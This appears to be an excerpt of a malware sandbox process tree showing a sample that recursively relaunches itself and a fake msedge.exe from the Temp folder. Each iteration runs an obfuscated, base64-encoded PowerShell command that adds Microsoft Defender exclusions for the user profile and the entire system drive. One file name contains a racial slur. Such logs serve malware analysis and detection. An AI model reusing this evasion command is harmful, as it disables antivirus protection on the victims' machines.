C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"95⤵PID:6000
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"95⤵PID:6248
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="96⤵PID:5924
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"96⤵PID:5424
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"96⤵PID:7112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="97⤵PID:6488
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"97⤵PID:5664
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"97⤵PID:7116
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="98⤵PID:7164
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"98⤵PID:3480
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"98⤵PID:2216
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="99⤵PID:5200
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"99⤵PID:6392
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"99⤵PID:2536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="100⤵PID:6368
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"100⤵PID:4360
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"100⤵PID:4688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="101⤵PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"101⤵PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"101⤵PID:1828
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="102⤵PID:5600
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"102⤵PID:2312
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"102⤵PID:4176
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="103⤵PID:6900
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"103⤵PID:6292
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"103⤵PID:1752
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="104⤵PID:6564
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"104⤵PID:5076
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"104⤵PID:3752
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="105⤵PID:7076
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"105⤵PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"105⤵PID:960
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="106⤵PID:3448
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"106⤵PID:4748
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"106⤵PID:4932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="107⤵PID:5664
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"107⤵PID:6384
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"107⤵PID:6096
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="108⤵PID:6976
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"108⤵PID:3480
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"108⤵PID:4864
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="109⤵PID:5804
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"109⤵PID:4264
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"109⤵PID:7080
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="110⤵PID:1860
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"110⤵PID:5604
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"110⤵PID:3912
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="111⤵PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"111⤵PID:3404
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"111⤵PID:5536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="112⤵PID:3824
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"112⤵PID:4964
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"112⤵PID:4408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="113⤵PID:5972
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"113⤵PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"113⤵PID:1336
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="114⤵PID:4556
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"114⤵PID:4364
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"114⤵PID:7044
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="115⤵PID:6316
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"115⤵PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"115⤵PID:4016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="116⤵PID:7084
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"116⤵PID:5028
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"116⤵PID:5332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="117⤵PID:6952
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"117⤵PID:2664
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"117⤵PID:1572
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="118⤵PID:6416
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"118⤵PID:5636
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"118⤵PID:4052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="119⤵PID:5032
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"119⤵PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"119⤵PID:5768
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="120⤵PID:2532
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"120⤵PID:5384
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"120⤵PID:6360
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="121⤵PID:3404
-
-
C:\Users\Admin\AppData\Local\Temp\msedge.exe"C:\Users\Admin\AppData\Local\Temp\msedge.exe"121⤵PID:5648
-
-
C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"121⤵PID:4832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="122⤵PID:6908
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-